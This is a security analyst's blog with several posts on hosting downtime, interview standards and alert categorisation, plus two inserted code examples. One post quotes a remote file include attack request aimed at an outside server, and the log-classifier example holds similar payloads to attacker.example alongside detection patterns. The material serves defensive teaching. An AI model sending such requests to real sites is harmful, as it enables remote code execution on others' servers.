Received an email from my hosting provider that they are going to perform a server relocation or migration which will result in approx. 8 hours of downtime on 30th Nov, meaning my sites will be inaccessible for that period.

p/s: using wifey's S.E. P1i to post this entry. It seems that the stylus is not meant for me. I'd stick to my lappy keypad.

This is the message I get when updating or patching(?) my VMware FreeBSD 6.2 release via freebsd-update. (OK, it has been quite sooooooooooooooooooooome time since I did the last update.)

WARNING: FreeBSD 6.2-RELEASE-p4 is approaching its End-of-Life date.
It is strongly recommended that you upgrade to a newer
release within the next 2 months.
ayoi# freebsd-update install
Installing updates… done.
ayoi#

The line is damned freakin' slow for downloading the ISO, btw.

Well, thanks to a commenter who left a comment on my post here. Anyway, I think I have to answer his queries accordingly to clarify a few things ;)

OK, first of all, why security.org.my and not ITTUTOR, HITB, etc.?

1st. I can say I know at least one person behind security.org.my, and AFAICS I think I am comfortable working with him. Most of the time we share the same view. Sadly, I can't say likewise for other sites and portals because I don't know who the creators are, etc.

2nd. I've been given the privilege of seeing the layout of this site, which I believe can only benefit the security community in our country.

3rd. I don't see the site as an advertising or propaganda tool for certain companies. If I'm not mistaken, there's a disclaimer that states:

DISCLAIMER
“All data and information provided on this site is for informational purposes and on an as-is basis.

This weblog does not represent the thoughts, intentions, plans or strategies of our employers. It is solely our opinions and views as security professionals.

Feel free to challenge us, disagree with us, or even tell us that we are complete mindless and brainless monkeys in the comment section of the blog entry.”

Anyway, if that site is used for advertising and promoting certain companies, then of course my bosses, who also read my blog, will act accordingly.

There are a lot of projects you can participate in, like PADS, tcpxtract, the fl0p signature database, virtual appliances, or you can even start providing interesting packet/traffic analysis, IDS signatures, etc., and maybe articles or howtos. Like I said, sharing is caring.

p/s: I never ever said that other sites are not good or not beneficial to others, because they are good and the moderators are very knowledgeable and helpful with their answers.

Recently my friend expressed his frustration with the candidates that came for a Security Analyst interview at his company. He commented that most of the candidates failed to grasp/understand the fundamentals of networking (never mind security). And what made him more frustrated was that the current position of some, if not most, of the candidates at their respective companies is Security Analyst. It sparks a question: how do they perform their daily tasks when they have failed to master the fundamental knowledge for the tasks that need to be performed? I have to agree with his comments and complaints, as I experienced this myself when conducting interviews some time ago (well, I'm not on the interviewer panel anymore, as I suspect the management thought that I am too selective in hiring Security Analysts).

Perhaps I could list down a few things that make these candidates fail their interviews.

a). Most of the candidates obviously failed to do some minor research/reading on the job they applied for. In that sense they are quite lost when asked a few job-related questions.

b). Failed to convey their message to the interviewer. In other words, a lack of communication skills. Some candidates I interviewed even mumbled when asked a question they considered quite difficult to answer.

c). Lack of self-confidence. IMHO, confidence comes when we are prepared, either mentally or physically. So one good way to enhance your confidence level is to avoid reason (a).

d). Lack of fundamental knowledge. This is so obvious. A Security Analyst, especially a Network Security Analyst, should at least know basic networking: things like protocols, stacks or layers, traffic patterns and others. It is surprising that the TCP handshake is considered something new for some of them, or that scanning and exploitation are considered the same thing.

I think for a start, we can assist or provide as much help as possible via knowledge sharing. Awareness of security itself can also be a good foundation for providing a proper understanding of this subject. For my security colleagues all over Malaysia, perhaps we can share the way we perform our analysis or the way we conduct our detection process. Maybe we can share knowledge on analysis techniques, data collection techniques or the tools used, which I believe can only benefit us all. We might share information on attack traffic patterns, their signatures, countermeasures, incident handling or even detection rules. For undergrads who have ambitions in the security field, maybe we can provide a proper roadmap and the knowledge and skills required to hold any position in this field. I think we can also describe the real working situation or environment, which perhaps can give potential candidates an idea of what to expect once you're in.

I alone don't have sufficient knowledge to provide all of the above, and that's why I believe, for a start, security.org.my can be a good platform for this purpose. I do believe there's no such thing as too late to start learning. Sharing is caring ;)

For those of you (especially in Malaysia), we have one site dedicated to the security scene in Malaysia. For the time being it consists of some news and security-related howtos. But in the future, that site will have news/articles/postings to cater to all kinds or levels of readers: whether you are a student who has an interest in joining the security field, a security practitioner who wants to learn or exchange new methodology and knowledge, or a decision maker who decides on the security implementation in your organization. Saying that doesn't mean that the site is not for those who don't have any interest in security; perhaps after visiting the site you might get general knowledge on what security is all about, and perhaps it can spark an interest in this field for you.

I for one hopefully can contribute a few things, especially on security awareness for users (the "having firewalls installed doesn't mean you are secured" thingy). I think the site owners also welcome any inputs/views/opinions/suggestions or even articles regarding the security state of our beloved country, Malaysia.

http:\\security.org.my <— my mistake. Err, you can use this as well, what ;)

http://security.org.my

I've read one "hot" email from one of my colleagues (he is the one who replaced me) at our client site in Jeddah. He is kinda pissed off with our SAs here (perhaps I was included as well). I don't blame him at all. I know exactly how he felt: assaulted from left, right, up and below on issues that sometimes have nothing to do with our scope of work there. I do pity him actually.

To be honest, I am tired of giving pep talks to these fellas here. Why?

1st, they are all grown men, most of them are fathers, and I don't know how I can do anything to change their attitude.

Yeah, I've had a few discussions and chit-chats with other colleagues, and all of us agree that attitude is the main characteristic that will determine how progressive you are in this field. I don't think this spoon-fed culture is suitable. To be frank, when I first joined this current company, I had little or shallow knowledge of security. But before I started to do the job, I made sure that I could perform the tasks of a security analyst (initially it was IDS analyst, to be exact). And thank God I was introduced to the proper definition of security and the tasks/processes, skills and knowledge required for an analyst to be a real analyst.

Now? I am still learning, but alas, I need a counterpart who can argue with me or share some knowledge, especially in this field. For some reason I do feel that the improvement is at a tortoise's rate.

Got a few projects in hand and hopefully I can fulfil them all.

p/s: To my colleague there at Jeddah. Hang on brother. ;)

Sometimes my consultant will come and see me to verify events that occurred at our clients. This is because some of the alerts or events have been categorized wrongly. It is not the SAs' fault, as IMHO the categories listed in our system are a little bit confusing. The problem occurs when it comes to the Scanning and Hacking Attempt categories. So I decided to express my view in an email, and of course, as I am a caring person (sharing is caring), I will post on this matter here.

First of all, regarding scanning or vulnerability scanning. Scanning or vulnerability scanning is a process or activity of gathering information. We can also call this reconnaissance. If we remember, there are 5 stages or phases of attack, which are reconnaissance, exploitation, reinforcement, consolidation and pillage. Let me list down the phases with a brief description of each.

1). Reconnaissance
Processes of validating connectivity, enumerating services, and checking for vulnerable applications. In other words, the information gathering process.

2). Exploitation
Process of abusing, subverting, or breaching services on a target. Abuse of a service involves making illegitimate use of a legitimate mode of access. For example, an intruder might log in to a server over Telnet, Secure Shell, or Microsoft Terminal Services using a username and password stolen from another system. This is the process where the attacker uses his exploit tools against the vulnerability he discovered during the reconnaissance process.

3). Reinforcement
This is the process where the intruders or attackers try to gain total (if not near-total) control of the compromised machine. Some exploits may only give the attacker user-level access. In the reinforcement process, attackers will try to escalate the access or privileges of that user.

4). Consolidation
This is when the attackers successfully establish communication with the compromised machines via a newly created channel (usually through a backdoor, etc.). The favourite communication method is via IRC channels (as the attacker can hide behind an anonymous or false identity).

5). Pillage
The execution of the main purpose of the compromise. DDoS is one of the favourite intentions.

Again, the phases mentioned above merely serve to categorize the attack phase. Some attacks perhaps skip one or two of the phases (usually scripted tools that come from unstructured threats). For example, Nessus scanning may be categorized as scanning, as it merely notifies the attacker of any vulnerability that may exist on the targeted machine. Attacks that generate Remote Include Path alerts are a good example of the difficulties that may exist in categorizing events. Why? Because there are times when these alerts trigger hundreds of times and the time gap between each alert is small (seconds). How to categorize these? For me it is simple.

Based on the payload itself, determine what the attackers are doing. For these Remote Include Path alerts, most of them didn't do any reconnaissance at all and went straight to the exploitation phase. I suggest they should be categorized as Hacking Attempt. Why? As shown by the sample payload below, there is no attempt at identifying the application information (most of the time the methodology is the same), and the attacker straight away instructs, or attempts to instruct, the application to run his exploit located on another server.

/G3T /admin.php?lnclude_p4th=http://www.reasons.org/tnrtb/wp-content/backup-b2b23/id2.txt?? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.blabla.com.my
User-Agent: libwww-perl/5.808

*I had to change a few characters, as mod_security will not allow these to be published.

So I recommend that SAs, to categorize their alerts or events, identify the intention of the attackers. That's why NSM data is important for the identification process.
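As an added example (not from the original post, and not Bejtlich's or any vendor's code), here is how that payload-first rule can be applied mechanically to web-server log lines. The per-request check flags a remote URL in any parameter value as exploitation (and, generalizing the same idea, a directory-traversal sequence); the per-source summary only calls a burst of 404s against several distinct paths "Scanning" when no such payload was seen from that source, so a hundred include_path requests in a few seconds still come out as "Hacking Attempt". The log lines, IP addresses, hostnames and thresholds are constructed for the example; the include_path requests are modelled on the payload above.

```python
"""Categorize web requests by what the payload is doing (recon vs exploitation),
then give one verdict per source IP. Constructed sample data, not real traffic."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed combined-log-style lines (addresses from RFC 5737 documentation ranges).
# The include_path requests are modelled on the payload quoted in the post.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Nov/2007:10:01:01 +0800] "GET /admin.php?include_path=http://attacker.example/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
203.0.113.5 - - [30/Nov/2007:10:01:02 +0800] "GET /index.php?include_path=http://attacker.example/id.txt?? HTTP/1.1" 200 512 "-" "libwww-perl/5.808"
203.0.113.5 - - [30/Nov/2007:10:01:02 +0800] "GET /blog/admin.php?page=http://attacker.example/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
198.51.100.9 - - [30/Nov/2007:10:05:10 +0800] "GET /phpmyadmin/ HTTP/1.1" 404 212 "-" "Mozilla/5.0"
198.51.100.9 - - [30/Nov/2007:10:05:10 +0800] "GET /pma/ HTTP/1.1" 404 212 "-" "Mozilla/5.0"
198.51.100.9 - - [30/Nov/2007:10:05:11 +0800] "GET /mysql/ HTTP/1.1" 404 212 "-" "Mozilla/5.0"
198.51.100.9 - - [30/Nov/2007:10:05:11 +0800] "GET /admin/ HTTP/1.1" 404 212 "-" "Mozilla/5.0"
192.0.2.77 - - [30/Nov/2007:10:09:00 +0800] "GET /index.php?page=about HTTP/1.1" 200 1034 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Payload markers that mean the client is already in the exploitation phase:
# a parameter pointing at a remote file to include, or a path traversal.
REMOTE_INCLUDE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")


def parse_line(line):
    """Split one combined-log line into its fields; returns None on malformed input."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def classify_request(target):
    """'exploitation' when the request payload itself is the attack, else 'probe'."""
    query = urlsplit(target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded values
        if REMOTE_INCLUDE_RE.match(value) or TRAVERSAL_RE.search(value):
            return "exploitation"
    return "probe"


def classify_source(records, probe_threshold=3, window_seconds=60):
    """One verdict per source: the payload decides, not the number of alerts."""
    by_src = defaultdict(list)
    for rec in records:
        by_src[rec["src"]].append(rec)
    verdicts = {}
    for src, recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        if any(classify_request(r["target"]) == "exploitation" for r in recs):
            verdicts[src] = "Hacking Attempt"  # went straight to exploitation
            continue
        span = (recs[-1]["ts"] - recs[0]["ts"]).total_seconds()
        not_found = sum(1 for r in recs if r["status"] == 404)
        paths = {urlsplit(r["target"]).path for r in recs}
        if (not_found >= probe_threshold and len(paths) >= probe_threshold
                and span <= window_seconds):
            verdicts[src] = "Scanning"  # enumerating paths that do not exist
        else:
            verdicts[src] = "Normal"
    return verdicts


def analyse(log_text):
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    return classify_source(records)


if __name__ == "__main__":
    for src, verdict in sorted(analyse(SAMPLE_LOG).items()):
        print(f"{src:16} {verdict}")
```

The thresholds are deliberately crude; the point is the ordering of the checks. A source that sent even one remote-include payload is classified by that payload, and the 404 burst heuristic is only consulted for sources that showed no exploitation attempt, which is the same reasoning the post applies by hand.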

So what do you think?

p/s: Btw, the phases and more on NSM can be read at taosecurity.blogspot.com, or buy the book: The Tao of Network Security Monitoring: Beyond Intrusion Detection by Richard Bejtlich.

Anyway, for anybody who feels offended by my last post here, I didn't mention any names, right? And of course I did point out many, many times during my years at the client site the importance of knowing, learning and acquiring the knowledge and skills of a security analyst. I do not feel I need to apologize for the post anyway.

Our Middle East project team had a meeting yesterday regarding adding value to our reporting to our clients there. There were many arguments, suggestions and opinions aired in that meeting which I don't think are appropriate to post here. Do not get me wrong, it was not a heated meeting, just a normal meeting (OK, because our CSO attended the meeting as well). My PM asked:

“If there is any company (competitor) that can provide or give assurance that their product can guarantee future security.”

I just smiled (I think I did laugh a bit) and shook my head. Just a simple "No" came out of my mouth. To be honest and frank, I am tired of speaking about security to my team (I think I have mentioned the process etc. countless times, whether in my training, email discussions and many others). Still they (I think it is more the management people) for some reason don't want to hear/listen to what we (the technical guys) tell them. We had a few arguments at the client site there in Jeddah, and I was a little bit surprised to hear that question come from him.

Anyway, I've read about the Proventia IPS touted as the Security Silver Bullet (OK, it was in 2003) at taosecurity. Actually the posting is about Deflecting the Silver Bullet: Educating the Management, not the User (why do I feel this is more than appropriate? Hehehehe). It is true that there's no all-in-one solution that can guarantee your network/systems are secured just by implementing that solution. I guess what these solutions can do is minimize the risk of the network/systems being breached. Did your car alarm prevent car thieves from stealing the car? Did having CCTV installed in your house prevent any burglary from happening? Or can the watchdogs assure that your premises will not be intruded upon in the future?

What those things do is make the thieves think twice about committing any criminal act against your property; those devices can only raise the difficulty level, in the hope of dampening any attempt at breaking in.

Anyway, what is the purpose of having those things when there is no one to react to the information produced by those devices? What is the purpose of having a car alarm when nobody is going to take any action when they hear the alarm? The same goes when nobody is monitoring the CCTV: the real purpose of having it installed is not met. What is the purpose of having the latest IPS/IDS/firewalls when there is nobody who can interpret/translate/understand the proper functions of these devices and the outputs/information produced by them?

It is surprising that STILL somebody attends an interview without doing some minor/major research on the job that he or she applied for. Interviewers sometimes will ask some tricky questions that need a calm head to answer, or to identify the trickiness of the question. Also, interviewers are human beings who understand that you might have some interview jitters or a few butterflies in the stomach, so to give you a chance, they might ask you to submit a written answer, usually via email (I think these interviewers are so kind and really want you to have the chance to get the job).

It might be understandable if you can't answer questions like these during the interview:

*For an ICMP packet, especially when using the ping command, which destination port is the packet sent to?

*What protocols exist/are located at the application layer?

*What is the usage of the DRP flags in TCP?

But what I can't understand is why these candidates failed to provide proper or correct answers to the questions above in their email. I do wonder whether they ever use any of the freely available internet search engines. During lunch just now I had some chit-chat with my colleagues. I pointed out that an interview can be a good indicator of whether the knowledge you have is sufficient for the industry, besides helping improve our own communication skills, especially in conveying our messages and thoughts. But then again, first of all, good research must be done. If not, all you can do is embarrass yourself.

*Questions courtesy of mr geek00l ;)
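To make the two protocol questions concrete, here is an added example (not from the original post, and not one of the interview answers) that builds and decodes an ICMP echo request and the three segments of a TCP handshake from raw bytes with Python's struct module. An ICMP header carries type, code, checksum, identifier and sequence number and has no port field at all, which is what the ping question is really testing; the flags that do exist in a TCP header are FIN, SYN, RST, PSH, ACK and URG (plus ECE and CWR from RFC 3168), which is what a candidate should know before answering the DRP question. Ports, sequence numbers and payload are made-up values.

```python
"""Decode ICMP echo and TCP headers from raw bytes; constructed packets, not a capture."""
import struct


def inet_checksum(data):
    """RFC 1071 one's-complement checksum over 16-bit words (used by ICMP)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


ICMP_ECHO_REQUEST = 8


def build_icmp_echo(ident, seq, payload=b"abcdefgh"):
    """ICMP echo request, the message `ping` sends. Fields: type, code, checksum, id, seq."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_icmp(pkt):
    """Decode the 8-byte ICMP header; there is no port field to decode."""
    typ, code, _csum, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    return {
        "type": typ, "code": code, "id": ident, "seq": seq, "payload": pkt[8:],
        "checksum_ok": inet_checksum(pkt) == 0,  # a valid packet sums to all ones
    }


# TCP flag bits in the data-offset/flags word (RFC 793; ECE/CWR from RFC 3168).
TCP_FLAGS = (("FIN", 0x001), ("SYN", 0x002), ("RST", 0x004), ("PSH", 0x008),
             ("ACK", 0x010), ("URG", 0x020), ("ECE", 0x040), ("CWR", 0x080))


def build_tcp(sport, dport, seq, ack, flags, window=65535):
    """20-byte TCP header, no options. Checksum left 0: it needs the IP pseudo-header."""
    bits = 0
    for name in flags:
        bits |= dict(TCP_FLAGS)[name]
    off_flags = (5 << 12) | bits  # data offset = 5 words = 20 bytes
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack, off_flags, window, 0, 0)


def parse_tcp(seg):
    """Decode the fixed TCP header and name the flags that are set."""
    sport, dport, seq, ack, off_flags, _win, _csum, _urg = struct.unpack("!HHIIHHHH", seg[:20])
    return {
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "header_len": (off_flags >> 12) * 4,
        "flags": [name for name, bit in TCP_FLAGS if off_flags & bit],
    }


def three_way_handshake(client_port, server_port, client_isn, server_isn):
    """The three segments of a TCP handshake, built then decoded: SYN, SYN/ACK, ACK."""
    syn = build_tcp(client_port, server_port, client_isn, 0, ["SYN"])
    syn_ack = build_tcp(server_port, client_port, server_isn, client_isn + 1, ["SYN", "ACK"])
    ack = build_tcp(client_port, server_port, client_isn + 1, server_isn + 1, ["ACK"])
    return [parse_tcp(s) for s in (syn, syn_ack, ack)]


if __name__ == "__main__":
    echo = parse_icmp(build_icmp_echo(ident=0x1234, seq=1))
    print("ICMP fields:", [k for k in echo if k != "payload"])  # no port among them
    for step in three_way_handshake(40001, 22, 1000, 5000):
        print(f"{step['sport']:>5} -> {step['dport']:<5} {'/'.join(step['flags']):8} "
              f"seq={step['seq']} ack={step['ack']}")
```

The sequence-number arithmetic is the part candidates most often get wrong: the SYN/ACK acknowledges the client's ISN plus one, and the final ACK acknowledges the server's ISN plus one, because a SYN consumes one sequence number even though it carries no data.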

My immediate boss told me last week that I might have to assist him on the company's project in one of the Gulf countries. The duration? 3 freakin' years. It is not definite yet, but just like the news that I had to go to Jeddah last time, I think it's 60% true. Anyway, he added that I can bring my family along this time if this is confirmed. (We did get the project, only the manpower is still undecided.) I told wifey about this and she okayed it.

If I do have to go, then I do need to have my family along. 6 months away from my family I can still accept, but years? I'll miss my twins' growth from the moment they learn how to talk, sit, crawl and walk, and there is no way I want to miss that. Damn, even Iman made a shocked sound when she saw me at the airport the moment I reached KL from Jeddah, and I was only away for two months. I can't imagine if I am gone for years.
